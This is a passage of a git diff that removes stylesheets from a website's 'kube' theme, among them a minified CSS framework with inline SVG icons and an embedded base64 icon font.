-  .datepicker-cell.datepicker-day-last a {
-    background: none;
-    color: rgba(0, 0, 0, 0.4); }
-    .datepicker-cell.datepicker-day-last a:hover {
-      color: #000; }
-  .datepicker-cell.datepicker-day-selected a {
-    background: #3d79f2;
-    color: #fff; }
-    .datepicker-cell.datepicker-day-selected a:hover {
-      color: #fff; }
-  .datepicker-cell.datepicker-day-disabled a,
-  .datepicker-cell.datepicker-day-disabled a:hover {
-    background: none !important;
-    color: rgba(0, 0, 0, 0.3) !important;
-    cursor: default; }
-
-.editable[placeholder]:empty:before {
-  content: attr(placeholder);
-  color: rgba(0, 0, 0, 0.4);
-  font-weight: normal; }
-
-.editable[placeholder]:empty:focus:before {
-  content: ""; }
-
-.livesearch-box {
-  position: relative;
-  display: block;
-  width: 100%; }
-  .livesearch-box input {
-    min-width: 120px; }
-  .livesearch-box .close {
-    position: absolute;
-    top: 50%;
-    margin-top: -6px;
-    right: 8px; }
-
-.livesearch-dropdown {
-  position: absolute;
-  z-index: 1000;
-  margin: 0;
-  list-style: none;
-  background: #fff;
-  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2);
-  max-height: 250px;
-  overflow: auto; }
-
-.loader {
-  display: inline-block;
-  margin: auto;
-  position: relative;
-  width: 32px;
-  height: 32px; }
-  .loader.small {
-    width: 20px;
-    height: 20px; }
-
-button .loader {
-  margin-bottom: -4px; }
-
-.loader-spinner {
-  width: 100%;
-  height: 100%;
-  border-radius: 50%;
-  margin: auto;
-  position: absolute;
-  left: 0;
-  right: 0;
-  top: 0;
-  bottom: 0;
-  margin: auto;
-  border: 4px solid rgba(0, 0, 0, 0.25);
-  border-bottom-color: #000;
-  -webkit-animation: rotate 2s linear 0s infinite;
-  animation: rotate 2s linear 0s infinite; }
-
-.notification {
-  position: fixed;
-  top: 1rem;
-  right: 1rem;
-  padding: .75rem 1rem;
-  padding-bottom: .5rem;
-  font-family: Consolas, Monaco, "Courier New", monospace;
-  font-size: 14px;
-  line-height: 20px;
-  background: #e0e1e1;
-  color: #313439;
-  font-weight: bold;
-  min-width: 220px;
-  max-width: 280px;
-  box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2); }
-  @media (max-width: 768px) {
-    .notification {
-      max-width: 100%;
-      left: 1rem; } }
-
-@keyframes progress-bar-stripes {
-  from {
-    background-position: 40px 0; }
-  to {
-    background-position: 0 0; } }
-
-.progress {
-  background: #d4d4d4;
-  height: 12px; }
-  .progress.absolute {
-    position: absolute;
-    top: 0;
-    left: 0;
-    width: 100%; }
-  .progress > div {
-    background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
-    background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
-    background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
-    -webkit-animation: progress-bar-stripes 2s linear infinite;
-    -moz-animation: progress-bar-stripes 2s linear infinite;
-    animation: progress-bar-stripes 2s linear infinite;
-    font-size: 10px;
-    line-height: 10px;
-    color: #fff;
-    padding: 1px 2px;
-    height: 100%;
-    background-color: #007eff;
-    background-size: 40px 40px; }
-    .progress > div:empty {
-      padding: 1px 0; }
-
-.selector {
-  position: relative;
-  display: inline-block; }
-
-.selector select {
-  z-index: 2;
-  position: absolute;
-  top: 0;
-  left: 0;
-  bottom: 0;
-  right: 0;
-  height: 100%;
-  width: 100%;
-  opacity: 0;
-  -webkit-appearance: menulist-button;
-  -moz-appearance: menulist-button;
-  -ms-appearance: menulist-button;
-  appearance: menulist-button; }
-
-.selector-trigger-box {
-  cursor: pointer;
-  position: relative;
-  display: block;
-  z-index: 1;
-  width: 100%;
-  padding-right: 8px; }
-
-.upload-box {
-  display: flex;
-  align-items: center;
-  justify-content: center;
-  flex-direction: column;
-  position: relative;
-  font-size: 12px;
-  line-height: 20px;
-  width: 100%;
-  min-height: 80px;
-  border: 2px dashed #d4d4d4;
-  background: #e0e1e1;
-  cursor: pointer;
-  overflow: hidden;
-  text-align: center; }
-
-.upload-placeholder {
-  opacity: .6; }
-
-.upload-hover,
-.upload-error {
-  border-color: rgba(0, 0, 0, 0.2); }
-
-.upload-hover {
-  background-color: rgba(0, 126, 255, 0.1); }
-
-.upload-error {
-  background-color: rgba(255, 51, 102, 0.1); }
-
-div.upload-target {
-  display: flex; }
-
-ol.upload-target,
-ul.upload-target {
-  list-style: none;
-  margin-left: 0; }
-  ol.upload-target li,
-  ul.upload-target li {
-    display: flex; }
-  ol.upload-target .close,
-  ul.upload-target .close {
-    top: 2px; }
-
-.upload-target .close {
-  order: 1;
-  background: #d4d4d4;
-  border-radius: 20px;
-  margin-left: 4px;
-  width: 20px;
-  height: 20px;
-  line-height: 20px; }
diff --git a/website/src/themes/kube/static/css/kube.min.css b/website/src/themes/kube/static/css/kube.min.css
deleted file mode 100644
index db60f9f50c..0000000000
--- a/website/src/themes/kube/static/css/kube.min.css
+++ /dev/null
@@ -1 +0,0 @@
-.button,body,button,h1,h1.title,h2,h3,h4,h5,h6{font-family:Arial,"Helvetica Neue",Helvetica,sans-serif}hr,iframe{border:none}cite,figcaption,var{opacity:.6}figure pre,kbd{border:1px solid rgba(0,0,0,.1)}.dropdown ul,nav ol,nav ul,ul.unstyled,ul.unstyled ul{list-style:none}audio,img,table,video{max-width:100%}input,select,td.align-middle,textarea,tr.align-middle td{vertical-align:middle}html{box-sizing:border-box}*,:after,:before{box-sizing:inherit}*{margin:0;padding:0;outline:0;-webkit-overflow-scrolling:touch}img,video{height:auto}svg{max-height:100%}::-moz-focus-inner{border:0;padding:0}input[type=radio],input[type=checkbox]{vertical-align:middle;position:relative;bottom:.15rem;font-size:115%;margin-right:3px}input[type=search]{-webkit-appearance:textfield}.button,button,select{-webkit-appearance:none}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}.inverted{color:#fff}.error{color:#f03c69}.success{color:#35beb1}.warning{color:#f7ba45}.focus{color:#1c86f2}.aluminum{color:#f8f8f8}.silver{color:#e0e1e1}.lightgray{color:#d4d4d4}.gray{color:#bdbdbd}.midgray{color:#676b72}.darkgray,body{color:#313439}.bg-black{background-color:#0d0d0e}.bg-inverted{background-color:#fff}.bg-error{background-color:#f03c69}.bg-success{background-color:#35beb1}.bg-warning{background-color:#f7ba45}.bg-focus{background-color:#1c86f2}.bg-aluminum{background-color:#f8f8f8}.bg-silver{background-color:#e0e1e1}.bg-lightgray{background-color:#d4d4d4}.bg-gray{background-color:#bdbdbd}.bg-midgray{background-color:#676b72}.bg-darkgray{background-color:#313439}.bg-highlight{background-color:#edf2ff}body,html{font-size:16px;line-height:24px}body{background-color:transparent}a{color:#3794de}a:hover{color:#f03c69}h1,h1.title,h2,h3,h4,h5,h6{font-weight:700;color:#0d0d0e;text-rendering:optimizeLegibility;margin-bottom:16px}.message,.monospace,code,kbd,pre,samp,var{font-family:Consolas,Monaco,"Courier New",monospace}h1.title{font-size:60px;line-height:64px;margin-bottom:8px}.h1,h1{font-size:48px;line-height:52px}.h2,h2{font-size:36px;line-height:40px}.h3,.h4,h3,h4{line-height:32px}.h3,h3{font-size:24px}.h4,h4{font-size:21px}.h5,h5{font-size:18px;line-height:28px}.h6,h6{font-size:16px;line-height:24px}.h1 a,.h2 a,.h3 a,.h4 a,.h5 a,.h6 a,h1 a,h2 a,h3 a,h4 a,h5 a,h6 a{color:inherit}blockquote+h2,blockquote+h3,blockquote+h4,blockquote+h5,blockquote+h6,dl+h2,dl+h3,dl+h4,dl+h5,dl+h6,figure+h2,figure+h3,figure+h4,figure+h5,figure+h6,form+h2,form+h3,form+h4,form+h5,form+h6,hr+h2,hr+h3,hr+h4,hr+h5,hr+h6,ol+h2,ol+h3,ol+h4,ol+h5,ol+h6,p+h2,p+h3,p+h4,p+h5,p+h6,pre+h2,pre+h3,pre+h4,pre+h5,pre+h6,table+h2,table+h3,table+h4,table+h5,table+h6,ul+h2,ul+h3,ul+h4,ul+h5,ul+h6{margin-top:24px}ol,ol ol,ol ul,ul,ul ol,ul ul{margin:0 0 0 24px}ol ol li{list-style-type:lower-alpha}ol ol ol li{list-style-type:lower-roman}nav ol,nav ul{margin:0}dd,nav ol ol,nav ol ul,nav ul ol,nav ul ul{margin-left:24px}dl dt{font-weight:700}address,blockquote,dl,fieldset,figure,form,hr,ol,p,pre,table,ul{margin-bottom:16px}hr{border-bottom:1px solid rgba(0,0,0,.1);margin-top:-1px}blockquote{padding-left:1rem;border-left:4px solid rgba(0,0,0,.1);font-style:italic;color:rgba(49,52,57,.65)}blockquote p{margin-bottom:.5rem}cite,code,figcaption,kbd,mark,pre,samp,small,time,var{font-size:87.5%}abbr[title],dfn[title]{border-bottom:1px dotted rgba(0,0,0,.5);cursor:help}var{font-style:normal}code,kbd,mark,samp{position:relative;top:-1px;padding:4px 4px 2px;display:inline-block;line-height:1;color:rgba(49,52,57,.85)}code{background:#e0e1e1}mark{background:#f7ba45}samp{color:#fff;background:#1c86f2}sub,sup{font-size:x-small;line-height:0;margin-left:1rem/4;position:relative}.small,.smaller,pre,pre code{line-height:20px}sup{top:0}sub{bottom:1px}pre,pre code{background:#f8f8f8;padding:0;top:0;display:block;color:rgba(49,52,57,.85);overflow:none;white-space:pre-wrap}pre,td,th{padding:1rem}.black,a.muted{color:#0d0d0e}figure figcaption{position:relative;top:-1rem/2}figure pre{background:0 0;border-radius:4px}figure .video-container,figure pre{margin-bottom:8px}.text-left{text-align:left}.label.badge,.text-center{text-align:center}.text-right{text-align:right}ul.unstyled{margin-left:0}.upper{text-transform:uppercase}.lower{text-transform:lowercase}.italic{font-style:italic!important}.strong{font-weight:700!important}.normal{font-weight:400!important}.muted{opacity:.55}a.muted:hover{opacity:1}.smaller{font-size:12px}.small{font-size:14px}.big{font-size:18px;line-height:28px}.large{font-size:20px;line-height:32px}.end{margin-bottom:0!important}.highlight{background-color:#edf2ff}.nowrap,.nowrap td{white-space:nowrap}@media (min-width:768px) and (max-width:1024px){.columns-2,.columns-3,.columns-4{column-gap:24px}.columns-2{column-count:2}.columns-3{column-count:3}.columns-4{column-count:4}}.row{display:flex;flex-direction:row;flex-wrap:wrap}.row.gutters,.row.gutters>.row{margin-left:-2%}@media (max-width:768px){.row{flex-direction:column;flex-wrap:nowrap}.row.gutters,.row.gutters>.row{margin-left:0}}.row.gutters>.col,.row.gutters>.row>.col{margin-left:2%}@media (max-width:768px){.row.gutters>.col,.row.gutters>.row>.col{margin-left:0}}.row.around{justify-content:space-around}.row.between{justify-content:space-between}.row.auto .col{flex-grow:1}.col-1{width:8.33333%}.offset-1{margin-left:8.33333%}.col-2{width:16.66667%}.offset-2{margin-left:16.66667%}.col-3{width:25%}.offset-3{margin-left:25%}.col-4{width:33.33333%}.offset-4{margin-left:33.33333%}.col-5{width:41.66667%}.offset-5{margin-left:41.66667%}.col-6{width:50%}.offset-6{margin-left:50%}.col-7{width:58.33333%}.offset-7{margin-left:58.33333%}.col-8{width:66.66667%}.offset-8{margin-left:66.66667%}.col-9{width:75%}.offset-9{margin-left:75%}.col-10{width:83.33333%}.offset-10{margin-left:83.33333%}.col-11{width:91.66667%}.offset-11{margin-left:91.66667%}.col-12{width:100%}.offset-12{margin-left:100%}.gutters>.col-1{width:calc(8.33333% - 2%)}.gutters>.offset-1{margin-left:calc(8.33333% + 2%)!important}.gutters>.col-2{width:calc(16.66667% - 2%)}.gutters>.offset-2{margin-left:calc(16.66667% + 2%)!important}.gutters>.col-3{width:calc(25% - 2%)}.gutters>.offset-3{margin-left:calc(25% + 2%)!important}.gutters>.col-4{width:calc(33.33333% - 2%)}.gutters>.offset-4{margin-left:calc(33.33333% + 2%)!important}.gutters>.col-5{width:calc(41.66667% - 2%)}.gutters>.offset-5{margin-left:calc(41.66667% + 2%)!important}.gutters>.col-6{width:calc(50% - 2%)}.gutters>.offset-6{margin-left:calc(50% + 2%)!important}.gutters>.col-7{width:calc(58.33333% - 2%)}.gutters>.offset-7{margin-left:calc(58.33333% + 2%)!important}.gutters>.col-8{width:calc(66.66667% - 2%)}.gutters>.offset-8{margin-left:calc(66.66667% + 2%)!important}.gutters>.col-9{width:calc(75% - 2%)}.gutters>.offset-9{margin-left:calc(75% + 2%)!important}.gutters>.col-10{width:calc(83.33333% - 2%)}.gutters>.offset-10{margin-left:calc(83.33333% + 2%)!important}.gutters>.col-11{width:calc(91.66667% - 2%)}.gutters>.offset-11{margin-left:calc(91.66667% + 2%)!important}.gutters>.col-12{width:calc(100% - 2%)}.gutters>.offset-12{margin-left:calc(100% + 2%)!important}.first{order:-1}.last{order:1}@media (max-width:768px){[class*=' offset-'],[class^=offset-]{margin-left:0}.row .col{margin-left:0;width:100%}.row.gutters .col{margin-bottom:16px}.first-sm{order:-1}.last-sm{order:1}}table{border-collapse:collapse;border-spacing:0;width:100%;empty-cells:show;font-size:15px;line-height:24px}table caption{text-align:left;font-size:14px;font-weight:500;color:#676b72}legend,th{font-weight:700}th{text-align:left;vertical-align:bottom}td{vertical-align:top}td,th{border-bottom:1px solid rgba(0,0,0,.05)}td:first-child,th:first-child{padding-left:0}td:last-child,th:last-child{padding-right:0}tfoot td,tfoot th{color:rgba(49,52,57,.5)}table.bordered td,table.bordered th{border:1px solid rgba(0,0,0,.05)}table.striped tr:nth-child(odd) td{background:#f8f8f8}table.bordered td:first-child,table.bordered th:first-child,table.striped td:first-child,table.striped th:first-child{padding-left:1rem}table.bordered td:last-child,table.bordered th:last-child,table.striped td:last-child,table.striped th:last-child{padding-right:1rem}table.unstyled td,table.unstyled th{border:none;padding:0}fieldset{font-family:inherit;border:1px solid rgba(0,0,0,.1);padding:2rem;margin-bottom:2rem;margin-top:2rem}legend{font-size:12px;text-transform:uppercase;padding:0 1rem;margin-left:-1rem;top:2px;position:relative;line-height:0}.button i,.req,button i{position:relative;top:1px}input,select,textarea{display:block;width:100%;font-family:inherit;font-size:15px;height:40px;outline:0;background-color:#fff;border:1px solid #d4d4d4;border-radius:3px;box-shadow:none;padding:0 12px}input.small,select.small,textarea.small{height:36px;font-size:13px;padding:0 12px;border-radius:3px}input.big,select.big,textarea.big{height:48px;font-size:17px;padding:0 12px;border-radius:3px}input:focus,select:focus,textarea:focus{outline:0;background-color:#fff;border-color:#1c86f2;box-shadow:0 0 1px #1c86f2 inset}input.error,select.error,textarea.error{background-color:rgba(240,60,105,.1);border:1px solid #f583a0}input.error:focus,select.error:focus,textarea.error:focus{border-color:#f03c69;box-shadow:0 0 1px #f03c69 inset}input.success,select.success,textarea.success{background-color:rgba(53,190,177,.1);border:1px solid #6ad5cb}input.success:focus,select.success:focus,textarea.success:focus{border-color:#35beb1;box-shadow:0 0 1px #35beb1 inset}input.disabled,input:disabled,select.disabled,select:disabled,textarea.disabled,textarea:disabled{resize:none;opacity:.6;cursor:default;font-style:italic;color:rgba(0,0,0,.5)}select{background-image:url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="9" height="12" viewBox="0 0 9 12"><path fill="#5e6c75" d="M0.722,4.823L-0.01,4.1,4.134-.01,4.866,0.716Zm7.555,0L9.01,4.1,4.866-.01l-0.732.726ZM0.722,7.177L-0.01,7.9,4.134,12.01l0.732-.726Zm7.555,0L9.01,7.9,4.866,12.01l-0.732-.726Z"/></svg>');background-repeat:no-repeat;background-position:right 1rem center}select[multiple]{background-image:none;height:auto;padding:.5rem .75rem}textarea{height:auto;padding:8px 12px;line-height:24px;vertical-align:top}input[type=file]{width:auto;border:none;padding:0;height:auto;background:0 0;box-shadow:none;display:inline-block}input.search,input[type=search]{background-repeat:no-repeat;background-position:8px 53%;background-image:url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><path fill="#000" fill-opacity="0.4" d="M14.891,14.39l-0.5.5a0.355,0.355,0,0,1-.5,0L9.526,10.529a5.3,5.3,0,1,1,2.106-4.212,5.268,5.268,0,0,1-1.1,3.21l4.362,4.362A0.354,0.354,0,0,1,14.891,14.39ZM6.316,2.418a3.9,3.9,0,1,0,3.9,3.9A3.9,3.9,0,0,0,6.316,2.418Z"/></svg>');padding-left:32px}input[type=radio],input[type=checkbox]{display:inline-block;width:auto;height:auto;padding:0}label{display:block;color:#313439;margin-bottom:4px;font-size:15px}label .desc,label .error,label .success,label.checkbox{text-transform:none;font-weight:400}label.checkbox{font-size:16px;line-height:24px;cursor:pointer;color:inherit}.button,.desc,.message,button{line-height:20px}label.checkbox input{margin-top:0}.form-checkboxes label.checkbox{display:inline-block;margin-right:16px}.req{font-weight:700;color:#f03c69;font-size:110%}.desc{color:rgba(49,52,57,.5);font-size:12px}span.desc{margin-left:4px}div.desc{margin-top:4px;margin-bottom:-8px}.form-buttons .button,.form-buttons button{margin-right:8px}.form-item,form{margin-bottom:2rem}.form .row:last-child .form-item,.form>.form-item:last-child{margin-bottom:0}.form span.error,.form span.success{font-size:12px;line-height:20px;margin-left:4px}.form-inline input,.form-inline select,.form-inline textarea{display:inline-block;width:auto}.append,.prepend{display:flex}.append input,.prepend input{flex:1}.append .button,.append span,.prepend .button,.prepend span{flex-shrink:0}.append span,.prepend span{display:flex;flex-direction:column;justify-content:center;font-weight:400;border:1px solid #d4d4d4;background-color:#f8f8f8;padding:0 .875rem;color:rgba(0,0,0,.5);font-size:12px;white-space:nowrap}.button,.label,button{display:inline-block;font-weight:500;text-decoration:none;vertical-align:middle}.prepend input{border-radius:0 3px 3px 0}.prepend .button{margin-right:-1px;border-radius:3px 0 0 3px!important}.append input,.prepend span{border-radius:3px 0 0 3px}.prepend span{border-right:none}.append .button{margin-left:-1px;border-radius:0 3px 3px 0!important}.append span{border-left:none;border-radius:0 3px 3px 0}.button,button{font-size:15px;color:#fff;background-color:#1c86f2;border-radius:3px;min-height:40px;padding:8px 20px;cursor:pointer;border:1px solid transparent}.button i,button i{margin:0 2px}.fixed,.no-scroll{position:fixed;top:0;left:0}input[type=submit]{width:auto}.button:hover,button:hover{outline:0;text-decoration:none;color:#fff;background-color:#4ca0f5}.button.disabled,.button:disabled{cursor:default;font-style:normal;color:rgba(255,255,255,.7);background-color:rgba(28,134,242,.7)}.breadcrumbs li.active a,.pagination li.active a,.pagination span{cursor:text}.button.small{font-size:13px;min-height:36px;padding:6px 20px;border-radius:3px}.button.big{font-size:17px;min-height:48px;padding:13px 24px;border-radius:3px}.button.large{font-size:19px;min-height:56px;padding:20px 36px;border-radius:3px}.button.outline{background:0 0;border-width:2px;border-color:#1c86f2;color:#1c86f2}.button.outline:hover{background:0 0;color:rgba(28,134,242,.6);border-color:rgba(28,134,242,.5)}.button.outline.disabled,.button.outline:disabled{background:0 0;color:rgba(28,134,242,.7);border-color:rgba(28,134,242,.5)}.button.inverted,.button.inverted:hover{color:#000;background-color:#fff}.button.inverted.disabled,.button.inverted:disabled{color:rgba(0,0,0,.7);background-color:rgba(255,255,255,.7)}.button.inverted.outline{background:0 0;color:#fff;border-color:#fff}.button.inverted.outline:hover{color:rgba(255,255,255,.6);border-color:rgba(255,255,255,.5)}.button.inverted.outline.disabled,.button.inverted.outline:disabled{background:0 0;color:rgba(255,255,255,.7);border-color:rgba(255,255,255,.5)}.button.inverted:hover{opacity:.7}.button.round{border-radius:56px}.button.raised{box-shadow:0 1px 3px rgba(0,0,0,.3)}.button.upper{text-transform:uppercase;letter-spacing:.04em;font-size:13px}.button.upper.small{font-size:11px}.button.upper.big{font-size:13px}.button.upper.large{font-size:15px}.button.secondary{color:#fff;background-color:#313439}.button.secondary:hover{color:#fff;background-color:#606670}.button.secondary.disabled,.button.secondary:disabled{color:rgba(255,255,255,.7);background-color:rgba(49,52,57,.7)}.button.secondary.outline{background:0 0;color:#313439;border-color:#313439}.button.secondary.outline:hover{color:rgba(49,52,57,.6);border-color:rgba(49,52,57,.5)}.button.secondary.outline.disabled,.button.secondary.outline:disabled{background:0 0;color:rgba(49,52,57,.7);border-color:rgba(49,52,57,.5)}.label{font-size:13px;background:#e0e1e1;line-height:18px;padding:0 10px;color:#313439;border:1px solid transparent;border-radius:4px}.label a,.label a:hover{color:inherit;text-decoration:none}.label.big{font-size:14px;line-height:24px;padding:0 12px}.label.tag,.label.upper{text-transform:uppercase;font-size:11px}.label.outline{background:0 0;border-color:#bdbdbd}.label.badge{border-radius:64px;padding:0 6px}.label.badge.big{padding:0 8px}.label.tag{padding:0;background:0 0;border:none}.label.tag.big{font-size:13px}.label.success{background:#35beb1;color:#fff}.label.success.outline,.label.success.tag{background:0 0;border-color:#35beb1;color:#35beb1}.label.error{background:#f03c69;color:#fff}.label.error.outline,.label.error.tag{background:0 0;border-color:#f03c69;color:#f03c69}.label.warning{background:#f7ba45;color:#0d0d0e}.label.warning.outline,.label.warning.tag{background:0 0;border-color:#f7ba45;color:#f7ba45}.label.focus{background:#1c86f2;color:#fff}.label.focus.outline,.label.focus.tag{background:0 0;border-color:#1c86f2;color:#1c86f2}.label.black{background:#0d0d0e;color:#fff}.label.black.outline,.label.black.tag{background:0 0;border-color:#0d0d0e;color:#0d0d0e}.label.inverted{background:#fff;color:#0d0d0e}.label.inverted.outline,.label.inverted.tag{background:0 0;border-color:#fff;color:#fff}.breadcrumbs{font-size:14px;margin-bottom:24px}.breadcrumbs ul{display:flex;align-items:center}.breadcrumbs.push-center ul{justify-content:center}.breadcrumbs a,.breadcrumbs span{font-style:normal;padding:0 10px;display:inline-block;white-space:nowrap}.breadcrumbs li:after{display:inline-block;content:'/';color:rgba(0,0,0,.3)}.breadcrumbs li.active a,.pagination a{text-decoration:none;color:#313439}.breadcrumbs li:last-child:after{display:none}.breadcrumbs li:first-child a,.breadcrumbs li:first-child span{padding-left:0}.pagination{margin:24px 0;font-size:14px}.close,.pagination.upper{font-size:12px}.pagination ul{display:flex;margin:0}.pagination.align-center ul{justify-content:center}.pagination a,.pagination span{border-radius:3px;display:inline-block;padding:8px 12px;line-height:1;white-space:nowrap;border:1px solid transparent}.pagination a:hover,.pagination li.active a,.pagination span{color:rgba(0,0,0,.5);border-color:#e0e1e1}.pager span{line-height:24px}.pager a,.pager span{padding-left:16px;padding-right:16px;border-radius:64px;border-color:rgba(0,0,0,.1)}.pager li{flex-basis:50%}.pager li.next{text-align:right}.pager.align-center li{flex-basis:auto;margin-left:4px;margin-right:4px}.pager.flat a,.pager.flat span{border:none;display:block;padding:0}.pager.flat a{font-weight:700}.pager.flat a:hover{background:0 0;text-decoration:underline}@media (max-width:768px){.pager.flat ul{flex-direction:column}.pager.flat li{flex-basis:100%;margin-bottom:8px;text-align:left}}@font-face{font-family:Kube;src:url(data:application/x-font-ttf;charset=utf-8;base64,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) format("truetype");font-weight:400;font-style:normal}.caret,.close,[class*=" kube-"],[class^=kube-]{font-family:Kube!important;speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.kube-calendar:before{content:"\e900"}.caret.down:before,.kube-caret-down:before{content:"\e901"}.caret.left:before,.kube-caret-left:before{content:"\e902"}.caret.right:before,.kube-caret-right:before{content:"\e903"}.caret.up:before,.kube-caret-up:before{content:"\e904"}.close:before,.kube-close:before{content:"\e905"}.kube-menu:before{content:"\e906"}.kube-search:before{content:"\e907"}.gutters .column.push-left,.push-left{margin-right:auto}.gutters .column.push-right,.push-right{margin-left:auto}.gutters .column.push-center,.push-center{margin-left:auto;margin-right:auto}.gutters .column.push-middle,.push-middle{margin-top:auto;margin-bottom:auto}.push-bottom{margin-top:auto}.align-middle{align-items:center}.align-right{justify-content:flex-end}.align-center{justify-content:center}.float-right{float:right}.float-left{float:left}.fixed{z-index:100;width:100%}.w5{width:5%}.w10{width:10%}.w15{width:15%}.w20{width:20%}.w25{width:25%}.w30{width:30%}.w35{width:35%}.w40{width:40%}.w45{width:45%}.w50{width:50%}.w55{width:55%}.w60{width:60%}.w65{width:65%}.w70{width:70%}.w75{width:75%}.w80{width:80%}.w85{width:85%}.w90{width:90%}.w95{width:95%}.w100{width:100%}.w-auto{width:auto}.w-small{width:480px}.w-medium{width:600px}.w-big{width:740px}.w-large{width:840px}.max-w5{max-width:5%}.max-w10{max-width:10%}.max-w15{max-width:15%}.max-w20{max-width:20%}.max-w25{max-width:25%}.max-w30{max-width:30%}.max-w35{max-width:35%}.max-w40{max-width:40%}.max-w45{max-width:45%}.max-w50{max-width:50%}.max-w55{max-width:55%}.max-w60{max-width:60%}.max-w65{max-width:65%}.max-w70{max-width:70%}.max-w75{max-width:75%}.max-w80{max-width:80%}.max-w85{max-width:85%}.max-w90{max-width:90%}.max-w95{max-width:95%}.max-w100{max-width:100%}.max-w-small{max-width:480px}.max-w-medium{max-width:600px}.max-w-big{max-width:740px}.max-w-large{max-width:840px}